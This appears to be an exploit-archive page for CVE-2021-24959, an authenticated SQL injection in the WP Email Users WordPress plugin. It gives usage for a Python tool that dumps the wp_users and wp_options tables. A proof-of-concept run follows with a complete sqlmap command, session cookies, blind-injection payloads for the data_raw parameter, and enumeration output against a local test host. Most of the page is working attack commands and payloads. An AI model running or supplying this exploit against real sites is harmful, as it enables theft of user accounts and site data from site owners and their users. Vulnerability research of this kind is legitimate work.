Share
## https://sploitus.com/exploit?id=ECB169A6-5B27-5D88-9D56-C2424EC0933C
# CVE-2021-24959

Description
---

The WP Email Users WordPress plugin through 1.7.6 does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, available to any authenticated users, allowing them to perform SQL injection attacks.

```
CVE 	CVE-2021-24959
CVSS 	8.8 (High)
Publicly Published 	January 31, 2022
Last Updated 	January 22, 2024
Researcher 	Krzysztof Zając - CERT PL
```

This tool will dump wp_users and wp_options.


How to use
---


```
usage: CVE-2021-24959.py [-h] -u URL [-un USERNAME] [-p PASSWORD]

WP Email Users <= 1.7.6 - SQL Injection Description: CVE-2021-24959 The WP Email Users WordPress plugin through 1.7.6 does not escape the data_raw parameter in the
weu_selected_users_1 AJAX action, available to any authenticated users, allowing them to perform SQL injection attacks.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Website URL
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
```

POC
---

```
python3 CVE-2021-24959.py -u http://kubernetes.docker.internal -un user -p user
The plugin version is below 1.7.7.
The plugin version is 1.7.6
Vulnerability check: http://kubernetes.docker.internal
Logged in successfully.
Command Line: sqlmap.py -u "http://kubernetes.docker.internal/wp-admin/admin-ajax.php"  --data="data_raw%5B%5D=&action=weu_selected_users_1" --time-sec=10 --threads 4  --batch -p data_raw[] -T wp_users,wp_options --dump --referer="http://kubernetes.docker.internal/wp-admin/" --level 3 --risk 3  --technique=BT --dbms=mysql --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" --cookie "_lscache_vary=36193a4836ccd8886b480d97874c6e09; wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1727270083%7CypC9NnM7X9UHKJQQn6iQAMjiJuiEifptBohNqPTbX5s%7Cd4a37484820e7215c7d4f6e255c1f5204b49557392dc6368d7270784a63bdd9f; wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1727097284; wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1727270083%7CypC9NnM7X9UHKJQQn6iQAMjiJuiEifptBohNqPTbX5s%7C296a7aa7ab54b062d71a4f60399e41643aba06b9b13ccbc4cdb13bf0b262a7a9; wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1727270083%7CypC9NnM7X9UHKJQQn6iQAMjiJuiEifptBohNqPTbX5s%7C296a7aa7ab54b062d71a4f60399e41643aba06b9b13ccbc4cdb13bf0b262a7a9"
___
__H__
___ ___[(]_____ ___ ___  {1.8.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
|_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:14:44 /2024-09-23/

[14:14:44] [WARNING] provided value for parameter 'data_raw[]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[14:14:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: data_raw[] (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: data_raw[]=-1975 OR 3344=3344&action=weu_selected_users_1

Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: data_raw[]=(CASE WHEN (8496=8496) THEN SLEEP(10) ELSE 8496 END)&action=weu_selected_users_1
---
[14:14:44] [INFO] testing MySQL
[14:14:44] [INFO] confirming MySQL
[14:14:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25, PHP 7.3.5
back-end DBMS: MySQL >= 5.0.0
[14:14:44] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[14:14:44] [INFO] fetching current database
[14:14:44] [INFO] retrieving the length of query output
[14:14:44] [INFO] resumed: 9
[14:14:44] [INFO] resumed: wordpress
[14:14:44] [INFO] fetching columns for table 'wp_users' in database 'wordpress'
```